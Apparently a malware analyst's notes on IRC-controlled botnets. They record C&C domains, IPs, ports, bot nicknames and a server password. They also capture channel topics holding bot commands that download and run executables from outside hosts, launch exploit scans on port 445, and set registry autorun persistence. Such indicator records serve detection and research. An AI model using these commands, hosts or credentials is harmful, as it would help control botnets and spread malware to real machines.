ulove.tigolbittys.info

Domains and Sub Domains
ilove.tigolbittys.info
ulove.tigolbittys.info
free.tinypicbox.com
one.tinypicbox.com

ulove.tigolbittys.info DNS_TYPE_A
178.32.55.3
83.15.10.202
91.121.78.121
178.32.48.79
178.32.49.4

Botnet C&C irc

83.15.10.202:7171

psyBNC2.3.2-7
Connected. Now logging in...
User Anonymous logged in.
-
Your IRC Client did not support a password. Please type /QUOTE PASS your password to connect.

Nick: [00|AUT|148343]
Username: XP-9617
Server Pass: fuck3d

Channel: #links#
Channel: #hp#

Topic is '^run.stop -s|^run http://dessertsrecipes.net/katrian/shell/r.exe c:\45jknl.exe 1|^asc -S -s|^http http://dessertsrecipes.net/katrian/shell/h.exe|^asc svrsvc_all 30 3 0 -e -b -s'
Set by ajlk on Wed Jun 30 05:55:57

Startup
HKLM\​SOFTWARE\​Microsoft\​Windows\​ CurrentVersion\​Run\​
info Windows Notify Service wntfy.exe

updat1.bejsis.com

Botnet C&C IRC
210.170.62.106:1234
Nick: n[AUT|XP]6732262
Username: 9142
Joined Channel: #dl#

Start up
HKLM\​SOFTWARE\​Microsoft\​Windows NT\​CurrentVersion\​Winlogon\​
info Userinit C:\​WINDOWS\​system32\​ userinit.exe,C:\​WINDOWS\​redfil.exe

java.KUTLUFAMILY.COM

java.KUTLUFAMILY.COM
88.255.104.172:81
Botnet C&C irc
Nick: [00_AUT_XP_1113366]
Username: SP3-899
Joined Channel: #kk with Password ^B^B^B^B
Channel Topic for Channel #kk: ".asc -S -s |.http http://94.76.194.116/k.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://94.76.194.116/bro.jpg c:\y2b3k2i6x6b9.exe c:\y2b3k2i6x6b9.exe -r -h"
Private Message to Channel #kk: "scan; Trying to get external IP."
Private Message to Channel #xs: "HTTP SET http://94.76.194.116/k.exe"
Private Message to Channel #kk: "scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 5 threads."
Private Message to Channel #kk: "scan; Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads."
Private Message to Channel #kk: "scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 10 threads."

Startup
HKLM\​SOFTWARE\​Microsoft\​Windows\​ CurrentVersion\​Run\​
info Microsoft Driver Setup C:\​WINDOWS\​system32\​Zsnkstm.exe
HKLM\​SOFTWARE\​Microsoft\ ​Windows\​CurrentVersion\​policies\​Explorer\​Run\​
info Microsoft Driver Setup C:\​WINDOWS\​system32\​Zsnkstm.exe

ms4alllll.tecBoom.com

ms4alllll.tecBoom.com:47221

Botnet C&C irc
o49949 changes topic to '.asc -S|.asc exp_all 25 2 0 -a -r|.asc exp_all 25 2 0 -b -r|.asc exp_all 25 2 0 -c'
* o49949 changes topic to 'finito'

Channels
/jojo #dpi
/jojo #a

.asc -S|.http http://208.53.183.164/httpd.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c

Channel #-: ".asc -S|.http http://208.53.183.162/ma32ol.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c"

Private Message to Channel #i: "HTTP SET http://208.53.183.162/ma32ol.exe" Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads." Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads." Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads." Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Trying to get external IP."

so that cndrive32.exe runs every time Windows starts
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"